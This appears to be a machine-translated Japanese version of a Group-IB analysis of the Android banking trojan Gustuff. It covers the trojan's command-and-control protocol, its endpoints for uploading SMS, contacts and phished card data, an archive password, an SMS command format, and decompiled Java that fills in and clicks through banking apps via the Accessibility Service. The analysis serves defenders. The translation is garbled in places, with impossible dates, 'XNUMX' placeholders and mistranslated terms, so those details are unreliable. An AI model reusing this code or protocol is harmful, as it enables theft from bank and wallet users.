Android のトロイの木馬 Gustuff がアカウントからクリーム (法定通貨と仮想通貨) をすくい取る方法

つい先日、Group-IB 報告された モバイル Android トロイの木馬 Gustuff の活動について。 これはもっぱら国際市場で活動し、100 の大手外国銀行の顧客、モバイル 32 暗号通貨ウォレットのユーザー、および大規模な電子商取引リソースを攻撃します。 しかし、Gustuff の開発者は、Bestoffer というニックネームでロシア語を話すサイバー犯罪者です。 彼は最近まで、彼のトロイの木馬を「知識と経験のある人々にとって本格的な製品」であると賞賛していました。

Group-IB の悪意のあるコード分析のスペシャリスト イワン・ピサレフ 彼は研究の中で、Gustuff の仕組みとその危険性について詳しく語っています。

グスタフは誰を探しているのですか？

Gustuff は、完全に自動化された機能を備えた新世代のマルウェアに属します。 開発者によると、このトロイの木馬は AndyBot マルウェアの改良版であり、2017 年 800 月以来、Android スマートフォンを攻撃し、有名な国際銀行や決済システムのモバイル アプリケーションを装ったフィッシング Web フォームを通じて金銭を盗んでいます。 Bestoffer の報告によると、Gustuff Bot のレンタル料金は月額 XNUMX ドルでした。

Gustuff サンプルの分析により、このトロイの木馬は、バンク オブ アメリカ、バンク オブ スコットランド、JP モルガン、ウェルズ ファーゴ、キャピタル ワン、TD バンク、PNC 銀行などの大手銀行のモバイル アプリケーションや暗号通貨ウォレットを使用している顧客をターゲットにしている可能性があることがわかりました。ビットコインウォレット、BitPay、Cryptopay、Coinbaseなど

元々は古典的なバンキング型トロイの木馬として作成されましたが、現在のバージョンでは、Gustuff は潜在的な攻撃対象のリストを大幅に拡大しています。 Gustuff は、銀行、フィンテック企業、暗号サービス向けの Android アプリケーションに加えて、マーケットプレイス アプリケーション、オンライン ストア、支払いシステム、インスタント メッセンジャーのユーザーを対象としています。 具体的には、PayPal、Western Union、eBay、Walmart、Skype、WhatsApp、Gett Taxi、Revolut などです。

エントリポイント: 集団感染の計算

Gustuff は、APK へのリンクを含む SMS メールを通じて Android スマートフォンに侵入する「古典的な」ベクトルを特徴としています。 Android デバイスがサーバーの命令でトロイの木馬に感染すると、Gustuff は感染した携帯電話の連絡先データベースまたはサーバー データベースを通じてさらに拡散する可能性があります。 Gustuff の機能は、大量感染とその運営者のビジネスの最大資本化を目的として設計されています。正規のモバイル バンキング アプリケーションと暗号ウォレットへの独自の「自動入力」機能を備えており、これにより金銭の盗難を迅速化および拡大することができます。

このトロイの木馬を調査したところ、自動入力機能が障害のある人向けのサービスであるアクセシビリティ サービスを使用して実装されていることが判明しました。 Gustuff は、この Android サービスを使用する他のアプリケーションのウィンドウ要素との相互作用に対する保護を回避することに成功した最初のトロイの木馬ではありません。 ただし、アクセシビリティ サービスをカーフィルと組み合わせて使用​​することはまだ非常にまれです。

被害者の携帯電話にダウンロードされた後、Gustuff はアクセシビリティ サービスを使用して、他のアプリケーション (銀行、仮想通貨、オンライン ショッピング、メッセージングなどのアプリケーション) のウィンドウ要素と対話し、攻撃者に必要なアクションを実行できるようになります。 。 たとえば、サーバーのコマンドにより、トロイの木馬はボタンを押して、銀行アプリケーションのテキスト フィールドの値を変更することができます。 Accessibility Service メカニズムを使用すると、このトロイの木馬は、銀行が前世代のモバイル トロイの木馬に対抗するために使用するセキュリティ メカニズムや、Google が Android OS の新しいバージョンに実装するセキュリティ ポリシーの変更をバイパスすることができます。 したがって、Gustuff は Google Protect 保護を無効にする「方法を知っています」。著者によると、この機能は 70% の場合に機能します。

Gustuff は、正規のモバイル アプリケーションのアイコンを使用して偽の PUSH 通知を表示することもできます。 ユーザーが PUSH 通知をクリックすると、サーバーからダウンロードされたフィッシング ウィンドウが表示され、そこで要求された銀行カードまたは暗号ウォレットのデータを入力します。 別の Gustuff シナリオでは、PUSH 通知が表示されたアプリケーションが開かれます。 この場合、マルウェアは、アクセシビリティ サービスを介したサーバーからのコマンドに応じて、銀行アプリケーションのフォーム フィールドに不正な取引を入力する可能性があります。

Gustuff の機能には、感染したデバイスに関する情報のサーバーへの送信、SMS メッセージの読み取り/送信、USSD リクエストの送信、SOCKS5 プロキシの起動、リンクの追跡、ファイル (文書の写真スキャン、スクリーンショット、写真を含む) への送信も含まれます。サーバーを削除し、デバイスを工場出荷時の設定にリセットします。

マルウェア分析

悪意のあるアプリケーションをインストールする前に、Android OS は、Gustuff によって要求された権限のリストを含むウィンドウをユーザーに表示します。

アプリケーションはユーザーの同意を得た後にのみインストールされます。 アプリケーションを起動すると、トロイの木馬はユーザーに次のウィンドウを表示します。

その後、アイコンが削除されます。

著者によれば、Gustuff は FTT の梱包業者によって梱包されています。 起動後、アプリケーションは定期的に CnC サーバーに接続してコマンドを受信します。 調査したいくつかのファイルでは、制御サーバーとして IP アドレスが使用されていました。 88.99.171[。]105 (以下、と表記します) <%CnC%>).

起動後、プログラムはサーバーへのメッセージの送信を開始します。 http://<%CnC%>/api/v1/get.php.

応答は次の形式の JSON であることが想定されます。

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
		<%Command parameters as JSON%>
        },
    },
}

アプリケーションがアクセスされるたびに、感染したデバイスに関する情報が送信されます。 メッセージのフォーマットを以下に示します。 注目に値するのは、フィールド フル, 余分な, アプリ и 許可 – オプションで、CnC からの要求コマンドの場合にのみ送信されます。

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
} 

設定データの保存

Gustuff は、運用上重要な情報を設定ファイルに保存します。 ファイル名とその中のパラメータの名前は、文字列から MD5 合計を計算した結果です。 15413090667214.6.1<%name%>どこ <%name%> — 初期の名前と値。 名前生成関数の Python 解釈:

 nameGenerator(input):
    output = md5("15413090667214.6.1" + input) 

以下では、それを次のように表します 名前ジェネレーター(入力).
したがって、最初のファイル名は次のようになります。 nameGenerator("API_SERVER_LIST")、次の名前の値が含まれています。

変数名	値
nameGenerator("API_SERVER_LIST")	CnC アドレスのリストが配列形式で含まれます。
nameGenerator("API_SERVER_URL")	CnC アドレスが含まれます。
nameGenerator("SMS_UPLOAD")	フラグはデフォルトで設定されます。 フラグが設定されている場合、SMS メッセージを CnC に送信します。
nameGenerator("SMS_ROOT_NUMBER")	感染したデバイスが受信した SMS メッセージの送信先の電話番号。 デフォルトはnullです。
nameGenerator("SMS_ROOT_NUMBER_RESEND")	フラグはデフォルトではクリアされます。 インストールされている場合、感染したデバイスが SMS を受信すると、SMS はルート番号に送信されます。
nameGenerator("DEFAULT_APP_SMS")	フラグはデフォルトではクリアされます。 このフラグが設定されている場合、アプリケーションは受信 SMS メッセージを処理します。
nameGenerator("DEFAULT_ADMIN")	フラグはデフォルトではクリアされます。 フラグが設定されている場合、アプリケーションには管理者権限があります。
nameGenerator("DEFAULT_ACCESSIBILITY")	フラグはデフォルトではクリアされます。 フラグが設定されている場合、アクセシビリティ サービスを使用するサービスが実行されています。
nameGenerator("APPS_CONFIG")	特定のアプリケーションに関連付けられたアクセシビリティ イベントがトリガーされたときに実行する必要があるアクションのリストを含む JSON オブジェクト。
nameGenerator("APPS_INSTALLED")	デバイスにインストールされているアプリケーションのリストを保存します。
nameGenerator("IS_FIST_RUN")	フラグは初回起動時にリセットされます。
nameGenerator("UNIQUE_ID")	一意の識別子が含まれます。 ボットが初めて起動されたときに生成されます。

サーバーからのコマンドを処理するモジュール

アプリケーションは、CnC サーバーのアドレスを、次のようにエンコードされた配列の形式で保存します。 Base85 線。 CnC サーバーのリストは、適切なコマンドを受信すると変更できます。その場合、アドレスは設定ファイルに保存されます。

リクエストに応じて、サーバーはアプリケーションにコマンドを送信します。 コマンドとパラメータは JSON 形式で表されることに注意してください。 アプリケーションは次のコマンドを処理できます。

チーム	説明
前進スタート	感染したデバイスが受信した SMS メッセージの CnC サーバーへの送信を開始します。
前進停止	感染したデバイスが受信した SMS メッセージの CnC サーバーへの送信を停止します。
ussdRun	USSDリクエストを実行します。 USSD リクエストを行う必要がある番号は、JSON フィールドの「number」にあります。
SMSを送信	XNUMX つの SMS メッセージを送信します (必要に応じて、メッセージはいくつかの部分に「分割」されます)。 このコマンドはパラメータとして、フィールド「to」（宛先番号）と「body」（メッセージの本文）を含む JSON オブジェクトを受け取ります。
sendSmsAb	感染したデバイスの連絡先リストに登録されている全員に SMS メッセージを送信します (必要に応じて、メッセージはいくつかの部分に「分割」されます)。 メッセージの送信間隔は 10 秒です。 メッセージの本文は JSON フィールド「body」にあります
sendSmsMass	コマンド パラメータで指定された連絡先に SMS メッセージを送信します (必要に応じて、メッセージはいくつかの部分に「分割」されます)。 メッセージの送信間隔は 10 秒です。 このコマンドはパラメータとして JSON 配列 (「sms」フィールド) を受け取ります。その要素には、宛先番号である「to」フィールドとメッセージの本文である「body」フィールドが含まれています。
サーバー変更	このコマンドは、パラメータとしてキー「url」を持つ値を受け取ることができます。その場合、ボットは nameGenerator(「SERVER_URL」) または「array」の値を変更します。その後、ボットは配列を nameGenerator (「API_SERVER_LIST」) に書き込みます。したがって、アプリケーションは CnC サーバーのアドレスを変更します。
管理者番号	このコマンドは、ルート番号を操作するように設計されています。 このコマンドは、次のパラメーターを持つ JSON オブジェクトを受け入れます。「number」 - nameGenerator(「ROOT_NUMBER」) を受信した値に変更します。「resend」 - nameGenerator(「SMS_ROOT_NUMBER_RESEND」) を変更します。「sendId」 - nameGenerator(「ROOT_NUMBER」に送信します) ） 一意のID。
更新情報	感染したデバイスに関する情報をサーバーに送信します。
データを消す	このコマンドはユーザー データを削除することを目的としています。 アプリケーションが起動された名前に応じて、デバイスの再起動によってデータが完全に消去されるか (プライマリ ユーザー)、ユーザー データのみが削除されます (セカンダリ ユーザー)。
靴下スタート	プロキシモジュールを起動します。 モジュールの動作については別のセクションで説明します。
靴下停止	プロキシモジュールを停止します。
オープンリンク	リンクに従ってください。 リンクは、「url」キーの下の JSON パラメータにあります。 リンクを開くには「android.intent.action.VIEW」を使用します。
すべてのSMSをアップロード	デバイスが受信したすべての SMS メッセージをサーバーに送信します。
すべての写真をアップロード	感染したデバイスから URL に画像を送信します。 URL はパラメータとして提供されます。
ファイルをアップロードする	感染したデバイスから URL にファイルを送信します。 URL はパラメータとして提供されます。
電話番号をアップロードする	連絡先リストの電話番号をサーバーに送信します。 キー「ab」を持つ JSON オブジェクト値をパラメーターとして受け取ると、アプリケーションは電話帳から連絡先のリストを受け取ります。 キー「sms」を持つ JSON オブジェクトをパラメータとして受信すると、アプリケーションは SMS メッセージの送信者から連絡先のリストを読み取ります。
変更アーカイブ	アプリケーションは、「url」キーを使用してパラメータとして渡されたアドレスからファイルをダウンロードします。 ダウンロードしたファイルは「archive.zip」という名前で保存されます。 次にアプリケーションは、オプションでアーカイブ パスワード「b5jXh37gxgHBrZhQ4j3D」を使用してファイルを解凍します。 解凍されたファイルは[外部ストレージ]/hgpsディレクトリに保存されます。 このディレクトリには、アプリケーションは Web フェイクを保存します (後述)。
行動	このコマンドは、アクション サービスで動作するように設計されており、これについては別のセクションで説明します。
test	何もしない。
ダウンロード	このコマンドは、リモート サーバーからファイルをダウンロードし、それを「Downloads」ディレクトリに保存することを目的としています。 URL とファイル名は、それぞれ JSON パラメータ オブジェクトのパラメータ「url」と「fileName」フィールドとして提供されます。
削除します	「ダウンロード」ディレクトリからファイルを削除します。 ファイル名は、「fileName」キーを持つ JSON パラメーターで指定されます。 標準のファイル名は「tmp.apk」です。
通知	管理サーバーによって定義された説明とタイトルのテキストを含む通知を表示します。

コマンドフォーマット 通知:

{
    "results" : "OK",
    "command":{
    "id": <%id%>,
    "command":"notification",
    "timestamp":<%Server Timestamp%>,
    "params":{
        "openApp":<%Open original app or not%>,
        "array":[
                      {"title":<%Title text%>,
                      "desc":<%Description text%>,
                      "app":<%Application name%>}
                   ]
                   },
        },
}

調査中のファイルによって生成された通知は、フィールドで指定されたアプリケーションによって生成された通知と同一に見えます。 アプリ。 フィールド値が アプリを開く — True、通知が開かれると、フィールドで指定されたアプリケーションが起動します アプリ。 フィールド値が アプリを開く — 偽の場合:

• フィッシング ウィンドウが開き、その内容がディレクトリからダウンロードされます。 <%外部ストレージ%>/hgps/<%ファイル名%>
• フィッシング ウィンドウが開き、その内容がサーバーからダウンロードされます <%url%>?id=<%Bot id%>&app=<%アプリケーション名%>
• Google Play カードを装ったフィッシング ウィンドウが開き、カードの詳細を入力するよう求められます。

アプリケーションはコマンドの結果を次の宛先に送信します。 <%CnC%>set_state.php 次の形式の JSON オブジェクトとして。

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    }
    "id":<%bot_id%>
}

アクションサービス
アプリケーションが処理するコマンドのリストには次のものが含まれます。 アクション。 コマンド処理モジュールはコマンドを受信すると、このサービスにアクセスして拡張コマンドを実行します。 このサービスは、JSON オブジェクトをパラメータとして受け入れます。 サービスは次のコマンドを実行できます。

1. PARAMS_ACTION — このようなコマンドを受信すると、サービスはまず JSON パラメーターから Type キーの値を受け取ります。これは次のとおりです。

• サービス情報 – サブコマンドは、JSON パラメーターからキーによって値を取得します。 含む重要ではない。 フラグが True の場合、アプリケーションはフラグを設定します。 FLAG_ISOLATED_PROCESS アクセシビリティサービスを使用してサービスにアクセスします。 このようにして、サービスは別のプロセスで開始されます。
• ルート — 現在フォーカスされているウィンドウに関する情報を受信し、サーバーに送信します。 アプリケーションは、AccessibilityNodeInfo クラスを使用して情報を取得します。
• 管理人 — 管理者権限を要求します。
• 遅らせる — 「data」キーのパラメータで指定されたミリ秒間、ActionsService を一時停止します。
• ウィンドウズ — ユーザーに表示されるウィンドウのリストを送信します。
• install — 感染したデバイスにアプリケーションをインストールします。 アーカイブ パッケージの名前は「fileName」キーにあります。 アーカイブ自体は、Downloads ディレクトリにあります。
• 全体的な – サブコマンドは、現在のウィンドウから移動することを目的としています。
  • クイック設定メニューで
  • 前に
  • 家
  • 通知へ
  • 最近開いたアプリケーションウィンドウへ

• 起動する - アプリケーションを起動します。 アプリケーション名はキーによるパラメータとして提供されます データ.
• 音 — サウンドモードを無音に変更します。
• アンロック — 画面とキーボードのバックライトを最大の明るさまでオンにします。 アプリケーションは、文字列 [Application lable]:INFO をタグとして指定して、WakeLock を使用してこのアクションを実行します。
• 許可オーバーレイ — 機能は実装されていません（コマンド実行に対する応答は {"message":"Not support"} または {"message":"low sdk"} です）
• ジェスチャー — 機能は実装されていません（コマンド実行に対する応答は {"message":"Not support"} または {"message":"Low API"} です）
• パーミッション — このコマンドは、アプリケーションのアクセス許可を要求するために必要です。 ただし、クエリ機能は実装されていないため、コマンドの意味はありません。 要求された権限のリストは、「permissions」キーを含む JSON 配列として提供されます。 標準リスト:
  • android.permission.READ_PHONE_STATE
  • android.permission.READ_CONTACTS
  • android.permission.CALL_PHONE
  • android.permission.RECEIVE_SMS
  • android.permission.SEND_SMS
  • android.permission.READ_SMS
  • android.permission.READ_EXTERNAL_STORAGE
  • android.permission.WRITE_EXTERNAL_STORAGE

• 開いた — フィッシングウィンドウを表示します。 サーバーからのパラメータに応じて、アプリケーションは次のフィッシング ウィンドウを表示する場合があります。
  • ディレクトリ内のファイルに内容が書き込まれるフィッシング ウィンドウを表示する <%外部ディレクトリ%>/hgps/<%param_filename%>。 ユーザーがウィンドウと対話した結果は、次の宛先に送信されます。 <%CnC%>/records.php
  • アドレスから内容が事前に読み込まれたフィッシング ウィンドウを表示します。 <%url_param%>?id=<%bot_id%>&app=<%packagename%>。 ユーザーがウィンドウと対話した結果は、次の宛先に送信されます。 <%CnC%>/records.php
  • Google Play カードを装ったフィッシング ウィンドウを表示します。

• 相互作用的 — このコマンドは、AcessibilityService を使用して他のアプリケーションのウィンドウ要素と対話するように設計されています。 インタラクションプログラムには特別なサービスが実装されています。 調査中のアプリケーションは Windows と対話できます。
  • 現在活動中。 この場合、パラメーターには、対話する必要があるオブジェクトの ID またはテキスト (名前) が含まれます。
  • コマンドの実行時にユーザーに表示されます。 アプリケーションは ID によって Windows を選択します。

  オブジェクトを受け取った アクセシビリティノード情報 対象のウィンドウ要素について、アプリケーションはパラメーターに応じて次のアクションを実行できます。

  • フォーカス — オブジェクトにフォーカスを設定します。
  • クリック — オブジェクトをクリックします。
  • actionId — ID によってアクションを実行します。
  • setText — オブジェクトのテキストを変更します。 テキストの変更は XNUMX つの方法で可能です: アクションを実行する ACTION_SET_TEXT (感染したデバイスの Android バージョンが以下の場合 ロリポップ)、または文字列をクリップボードに配置してオブジェクトに貼り付けます (古いバージョンの場合)。 このコマンドは、銀行アプリケーションのデータを変更するために使用できます。

2. PARAMS_ACTIONS - と同じ PARAMS_ACTION、コマンドの JSON 配列のみが到着します。

他のアプリケーションのウィンドウ要素と対話する機能がどのようなものであるかに興味がある人は多いと思われます。 この機能が Gustuff に実装される方法は次のとおりです。

boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
    int count = action.optInt("repeat", 1);
    Iterator aiListIterator = ((Iterable)aiList).iterator();
    int count = 0;
    while(aiListIterator.hasNext()) {
        Object ani = aiListIterator.next();
        if(1 <= count) {
            int index;
            for(index = 1; true; ++index) {
                if(action.has("focus")) {
                    if(((AccessibilityNodeInfo)ani).performAction(1)) {
                        ++count;
                    }
                }
                else if(action.has("click")) {
                    if(((AccessibilityNodeInfo)ani).performAction(16)) {
                        ++count;
                    }
                }
                else if(action.has("actionId")) {
                    if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
                        ++count;
                    }
                }
                else if(action.has("setText")) {
                    customHeader ch = CustomAccessibilityService.a;
                    Context context = this.getApplicationContext();
                    String text = action.optString("setText");
                    if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
                        ++count;
                    }
                }
                if(index == count) {
                    break;
                }
            }
        }
        ((AccessibilityNodeInfo)ani).recycle();
    }
    res.addPropertyNumber("res", Integer.valueOf(count));
}

テキスト置換機能：

boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if(Build$VERSION.SDK_INT >= 21) {
        Bundle b = new Bundle();
        b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
        result = ani.performAction(0x200000, b);  // ACTION_SET_TEXT
    }
    else {
        Object clipboard = context.getSystemService("clipboard");
        if(clipboard != null) {
        ((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
        result = ani.performAction(0x8000);  // ACTION_PASTE
        }
        else {
            result = false;
        }
    }
    return result;
}

したがって、コントロール サーバーが正しく設定されていれば、Gustuff は銀行アプリケーションのテキスト フィールドに入力し、取引を完了するために必要なボタンをクリックすることができます。 このトロイの木馬は、アプリケーションにログインする必要さえありません。PUSH 通知を表示するコマンドを送信し、以前にインストールされた銀行アプリケーションを開くだけで十分です。 ユーザーは自分自身を認証し、その後、Gustuff が車にガソリンを入れることができるようになります。

SMSメッセージ処理モジュール

アプリケーションは、感染したデバイスが SMS メッセージを受け入れるためのイベント ハンドラーをインストールします。 調査対象のアプリケーションは、SMS メッセージの本文に含まれるコマンドをオペレーターから受信できます。 コマンドは次の形式で提供されます。

7!5=<%Base64 エンコードされたコマンド%>

アプリケーションは、すべての受信 SMS メッセージ内の文字列を検索します。 7!5=、文字列が検出されると、オフセット 64 で Base4 から文字列をデコードし、コマンドを実行します。 コマンドは CnC のコマンドと似ています。 実行結果は、コマンドを送信した番号と同じ番号に送信されます。 応答形式:

7*5=<%「result_code コマンド」の Base64 エンコード%>

オプションで、アプリケーションは受信したすべてのメッセージをルート番号に送信できます。 これを行うには、設定ファイルでルート番号を指定し、メッセージ リダイレクト フラグを設定する必要があります。 SMS メッセージは次の形式で攻撃者の番号に送信されます。

<%Fromnumber%> - <%Time、形式: dd/MM/yyyy HH:mm:ss%> <%SMS body%>

また、オプションで、アプリケーションは CnC にメッセージを送信できます。 SMS メッセージは JSON 形式でサーバーに送信されます。

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

フラグが立っている場合 nameGenerator("DEFAULT_APP_SMS") – アプリケーションは SMS メッセージの処理を停止し、受信メッセージのリストをクリアします。

プロキシモジュール

調査中のアプリケーションには、構成を含む静的フィールドを含む別のクラスを持つ Backconnect Proxy モジュール (以下、プロキシ モジュールと呼びます) が含まれています。 構成データはサンプルにクリア形式で保存されます。

プロキシ モジュールによって実行されるすべてのアクションはファイルに記録されます。 これを行うために、外部ストレージ内のアプリケーションは、ログ ファイルが保存される「logs」というディレクトリ (構成クラスの ProxyConfigClass.logsDir フィールド) を作成します。 ログは次の名前のファイルに記録されます。

1. main.txt – CommandServer というクラスの作業がこのファイルに記録されます。 以下では、文字列 str をこのファイルに記録することを mainLog(str) と表記します。
2. セッション-<%id%>.txt — このファイルには、特定のプロキシ セッションに関連付けられたログ データが保存されます。 以下では、文字列 str をこのファイルに記録することを sessionLog (str) と表記します。
3. サーバー.txt – このファイルは、上記のファイルに書き込まれたすべてのデータを記録するために使用されます。

ログデータ形式:

<%Date%> [スレッド[<%スレッド ID%>]、ID[]]: ログ文字列

プロキシ モジュールの操作中に発生した例外もファイルに記録されます。 これを行うために、アプリケーションは次の形式で JSON オブジェクトを生成します。

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

次に、それを文字列表現に変換してログに記録します。

プロキシ モジュールは、対応するコマンドを受信した後に起動されます。 プロキシ モジュールを起動するコマンドを受信すると、アプリケーションは と呼ばれるサービスを開始します。 メインサービス、プロキシ モジュールの動作の管理、つまり開始と停止を担当します。

サービス開始の段階:

1. XNUMX 分に XNUMX 回実行されるタイマーを開始し、プロキシ モジュールのアクティビティをチェックします。 モジュールがアクティブでない場合は、モジュールが起動されます。
イベントがトリガーされたときも android.net.conn.CONNECTIVITY_CHANGE プロキシモジュールが起動します。

2. アプリケーションはパラメータを使用してウェイクロックを作成します パーシャル_ウェイク_ロック そして彼を捕まえます。 これにより、デバイスの CPU がスリープ モードになるのを防ぎます。

3. プロキシモジュールのコマンド処理クラスを起動し、最初に行をログに記録します。 mainLog("サーバーの起動") и

Server::start() host[<%proxy_cnc%>]、commandPort[<%command_port%>]、proxyPort[<%proxy_port%>]

どこ proxy_cnc、command_port、および proxy_port – プロキシサーバー設定から取得したパラメータ。

コマンド処理クラスが呼び出されます。 コマンド接続。 起動直後に次のアクションを実行します。

4. に接続します ProxyConfigClass.host: ProxyConfigClass.commandPort そして、感染したデバイスに関するデータを JSON 形式で送信します。

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

ここで：

• id – 識別子。「x」という名前の共有設定ファイルから「id」フィールドの値を取得しようとします。 この値を取得できなかった場合は、新しい値が生成されます。 したがって、プロキシ モジュールには独自の識別子があり、ボット ID と同様に生成されます。
• imei — デバイスの IMEI。 値の取得プロセス中にエラーが発生した場合、このフィールドの代わりにエラー テキスト メッセージが書き込まれます。
• imsi — デバイスの国際モバイル加入者 ID。 値の取得プロセス中にエラーが発生した場合、このフィールドの代わりにエラー テキスト メッセージが書き込まれます。
• モデル — エンドユーザーに表示される最終製品の名前。
• 製造元 — 製品/ハードウェアの製造元 (Build.MANUFACTURER)。
• androidVersion - 「<%release_version%> (<%os_version%>),<%sdk_version%>」形式の文字列
• 国 — デバイスの現在の場所。
• PartnerId は空の文字列です。
• packageName – パッケージ名。
• networkType — 現在のネットワーク接続のタイプ (例: 「WIFI」、「MOBILE」)。 エラーの場合はnullを返します。
• hasGsmSupport – true – 電話機が GSM をサポートする場合、それ以外の場合は false。
• simReady – SIM カードの状態。
• sim Country - ISO 国コード (SIM カードプロバイダーに基づく)。
• networkOperator — オペレーター名。 値の取得プロセス中にエラーが発生した場合、このフィールドの代わりにエラー テキスト メッセージが書き込まれます。
• simOperator — サービス プロバイダー名 (SPN)。 値の取得プロセス中にエラーが発生した場合、このフィールドの代わりにエラー テキスト メッセージが書き込まれます。
• version - このフィールドは config クラスに保存されます。テストされたボットのバージョンでは、「1.6」に等しくなります。

5. サーバーからのコマンドを待つモードに切り替わります。 サーバーからのコマンドは次の形式になります。

• 0 オフセット - コマンド
• 1 オフセット – sessionId
• 2 オフセット – 長さ
• 4 オフセット - データ

コマンドが到着すると、アプリケーションは以下をログに記録します。
mainLog("ヘッダー { sessionId<%id%>]、タイプ[<%command%>]、長さ[<%length%>] }")

サーバーからは次のコマンドが可能です。

名前	Command	且つ	説明
接続ID	0	接続 ID	新しい接続を作成する
SLEEP	3	Time	プロキシモジュールを一時停止します
卓球	4	-	PONG メッセージを送信する

PONG メッセージは 4 バイトで構成され、次のようになります。 0x04000000.

connectionId コマンドを受信したとき (新しい接続を作成するため) コマンド接続 クラスのインスタンスを作成します プロキシ接続.

• XNUMX つのクラスがプロキシ処理に参加します。 プロキシ接続 и end。 クラスを作成するとき プロキシ接続 アドレスに接続する ProxyConfigClass.host: ProxyConfigClass.proxyPort そして、JSON オブジェクトを渡します。

 {
    "id":<%connectionId%>
}

これに応じて、サーバーは、接続を確立する必要があるリモート サーバーのアドレスを含む SOCKS5 メッセージを送信します。 このサーバーとの対話はクラスを通じて行われます end。 接続セットアップは次のように概略的に表すことができます。

ネットワークインタラクション

ネットワーク スニファーによるトラフィック分析を防ぐために、CnC サーバーとアプリケーション間の対話を SSL プロトコルを使用して保護できます。 サーバーとの間で送受信されるすべてのデータは JSON 形式で表示されます。 アプリケーションは動作中に次のリクエストを実行します。

• http://<%CnC%>/api/v1/set_state.php — コマンドの実行結果。
• http://<%CnC%>/api/v1/get.php — コマンドを受信して​​います。
• http://<%CnC%>/api/v1/load_sms.php — 感染したデバイスから SMS メッセージをダウンロードする。
• http://<%CnC%>/api/v1/load_ab.php — 感染したデバイスから連絡先のリストをアップロードする。
• http://<%CnC%>/api/v1/aevents.php – リクエストは、設定ファイルにあるパラメータを更新するときに行われます。
• http://<%CnC%>/api/v1/set_card.php — Google Play マーケットを装ったフィッシングウィンドウを使用して取得したデータをアップロードする。
• http://<%CnC%>/api/v1/logs.php – ログデータのアップロード。
• http://<%CnC%>/api/v1/records.php – フィッシングウィンドウを通じて取得したデータのアップロード。
• http://<%CnC%>/api/v1/set_error.php – 発生したエラーの通知。

提言

モバイル トロイの木馬の脅威から顧客を保護するために、企業は、ユーザー デバイスに追加のソフトウェアをインストールすることなく、悪意のあるアクティビティを監視および防止できる包括的なソリューションを使用する必要があります。

これを行うには、クライアントとアプリケーション自体の両方の動作を分析するテクノロジーを使用して、モバイル トロイの木馬を検出するための署名方法を強化する必要があります。 この保護には、デジタル指紋技術を使用したデバイス識別機能も含める必要があります。これにより、アカウントが非定型デバイスから使用され、すでに詐欺師の手に渡った場合を把握できるようになります。

基本的に重要な点は、クロスチャネル分析が利用できることです。これにより、企業はインターネットだけでなく、モバイル チャネルでも発生するリスクを制御できます。たとえば、モバイル バンキングのアプリケーション、仮想通貨やその他の取引のアプリケーションなどです。金融取引。

ユーザーのための安全ルール:

• Android OS を搭載したモバイル デバイスには、Google Play 以外のソースからアプリケーションをインストールしないでください。アプリケーションによって要求される権利には特に注意してください。
• Android OS アップデートを定期的にインストールします。
• ダウンロードしたファイルの拡張子に注意してください。
• 疑わしいリソースにはアクセスしないでください。
• SMS メッセージで受信したリンクをクリックしないでください。

